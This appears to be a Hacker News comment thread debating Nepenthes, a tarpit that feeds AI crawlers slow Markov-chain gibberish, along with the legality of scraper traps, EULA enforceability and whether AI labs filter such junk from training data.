It is like a never ending fast food restaurant for LLMs forced to eat garbage input and will destroy the quality of the model when used later.

Hope to see this sort of defense used widely to protect websites from LLM scrapers.

bwfan12318 hours ago

indeed. this will spur research on how to distinguish BS from legit content. which is the fundamental hallucination problem in llms.

and all of us will benefit from this.

ezrast14 hours ago

You can't programatically detect novel BS any more than you can programatically detect viruses or spam. You can only add the fingerprints of known badness into an ever-growing database. Viruses and spam are antagonistic to well-resourced institutions, and their databases get maintained reasonably well. LLM slop is being generated by those same well-resourced institutions. I don't think it fits into the same category as Nepenthes.

guluarte8 hours ago

markov chains?

deadbabe14 hours ago

Does anyone have a convenient way to create a Markov babbler from the entire corpus of Hackernews text?

grahamj17 hours ago

That’s so funny, I’ve thought of this exact idea several times over the last couple of weeks. As usual someone beat me to it :D

GaggiX18 hours ago

As always, I find it hilarious that some people believe that these companies will train their flagship model on uncurated data, and that text generated by a Markov chain will not be filtered out.

JTyQZSnP3cQGa8B13 hours ago

Then why the DDOS on random web sites?

GaggiX13 hours ago

I guess that depends on how the webspider is configured, I doubt the curation is done in real-time while scraping.

at_a_remove19 hours ago

I have a very vague concept for this, with a different implementation.

Some, uh, sites (forums?) have content that the AI crawlers would like to consume, and, from what I have heard, the crawlers can irresponsibly hammer the traffic of said sites into oblivion.

What if, for the sites which are paywalled, the signup, which invariably comes with a long click-through EULA, had a legal trap within it, forbidding ingestion by AI models on pain of, say, owning ten percent of the company should this be violated. Make sure there is some kind of token payment to get to the content.

Then seed the site with a few instances of hapax legomenon. Trace the crawler back and get the resulting model to vomit back the originating info, as proof.

This should result in either crawlers being more respectful or the end of the hated click-through EULA. We win either way.

928340923219 hours ago

This doesn't work like you think it does but even if it did, do you have the money to sustain several years long legal battle against OpenAI?

grajaganDev19 hours ago

Exactly, the lawyers would be the only winners (as usual).

slavik8118 hours ago

In Canada and the United States, the penalties for breach of contract are determined based on the actual damages caused. Penalty clauses are generally not enforceable. The courts would ignore your clause and award a dollar amount based on whatever actual damages that you can prove.

That said, I am not a lawyer and this may not be true in all jurisdictions.

registeredcorn19 hours ago

I seem to recall some online lawyer saying that much of what's actually described in EULAs isn't strictly enforceable, simply because it is mentioned.

For example, a EULA might have buried in it that by agreeing, you will become their slave for the next 10 years of your life (or something equally ridiculous). Were it to actually go to court for "violating the agreement", it would be obvious that no rational person would ever actually agree to such an agreement.

It basically boiled down to a claim that the entire process of EULAs are (mostly) pointless because it's understood that no one reads them, but companies insist upon them because a false sense of protection, and the ability to threaten violators of (whatever activity) is better than nothing. A kind of "paper threat".

As it's coming back to me, I think one of the real world examples they used was something like this:

If you go to a golf course and see a sign that says, "The golf course is not responsible for damage to your car from golf balls." The sign is essentially meant as false deterrent - It's there to keep people from complaining by, "informing them of the risk", and make it seem official, so employees will insist it's true if anyone complains, but if you were actually to take it to court, the golf course might still be found culpable because they theoretically could have done something to prevent damage to customers cars and they were aware of the damage that could be caused.

Basically, just because a sign (or the EULA) says it, doesn't make it so.

grajaganDev19 hours ago

Legal traps are not a thing.

rvnx19 hours ago

Laws don't apply to billionaires

grajaganDev19 hours ago

Agreed.

observationist18 hours ago

[flagged]

jsheard18 hours ago

This is a really bad take, it's not like this server is hacking clients which connect to it. It's providing perfectly valid HTTP responses that just happen to be slow and full of markov gibberish, any harm which comes of that is self inflicted by assuming that websites must provide valuable data as a matter of course.

If AI companies want to sue webmasters for that then by all means, they can waste their money and get laughed out of court.

bwfan12318 hours ago

yea, it comes across as an extremely entitled mobster take.

heads i win, tails you lose. we own all your content, and you better behave.

i can bet this is incentive-speak.

observationist17 hours ago

[flagged]

tofof16 hours ago

Please provide a citation for a law that proscribes me from publically offering a service which consumes time while it is voluntarily engaged with.

jazzyjackson15 hours ago

I guess it's an unpopular take but I don't see why it was flagged. It's a good point of discussion.

observationist18 hours ago

[flagged]

blibble18 hours ago

> If you want to protect your content, use the technical mechanisms that are available,

> You can choose to gatekeep your content, and by doing so, make it unscrapeable, and legally protected.

so... robots.txt, which the AI parasites ignore?

> Also, consider that relatively small, cheap llms are able to parse the difference between meaningful content and Markovian jabber such as this software produces.

okay, so it's not damaging, and there you've refuted your entire argument

+1
observationist17 hours ago
tofof17 hours ago

He's not interfering with any normal operation of any system. He is offering links. You can follow them or not, entirely at your own discretion. Those links load slowly. You can wait for them to complete or not, entirely at your own discretion.

The crawler's normal operation is not interfered with in any way: the crawler does exactly what it's programmed to do. If its programmers decided it should exhaustively follow links, he's not preventing it from doing that operation.

Legally, at best you'd be looking to warp the concept of attractive nuisance to apply to a crawler. As that legal concept is generally intended to prevent bodily harm to children, however, good luck.

grajaganDev18 hours ago

Are you a lawyer?

observationist17 hours ago

[flagged]

jazzyjackson15 hours ago

I broadly agree with what you're trying to get across here, but I don't see why I can't set my own standards for what use of my server is authorized or not.

If I publish content at my domain, I can set up blocklists to refuse access to IP ranges I consider more likely to be malicious than not. Is that not already breaking the social contract you're pointing to wrt serving content public ? picking and choosing which parts of the public will get a response from my server ? (I would also be interested to know if there is actual law vs social contracts around behavior) So why shouldn't I be able enforce expectations on how my server is used? The vigilantism aspect of harming the person breaking the rules is another matter, I'm on the fence.

Consider the standard warning posted to most government sites, which is more or less a "no trespassing sign" [0] informing anyone accessing the system what their expectations should be and what counts as authorized use. I suppose it's not a legally binding contract to say "you agree to these terms by requesting this url" but I'm pretty sure convictions have happened with hackers who did not have a contract with the service provider.

[0] https://ir.nist.gov/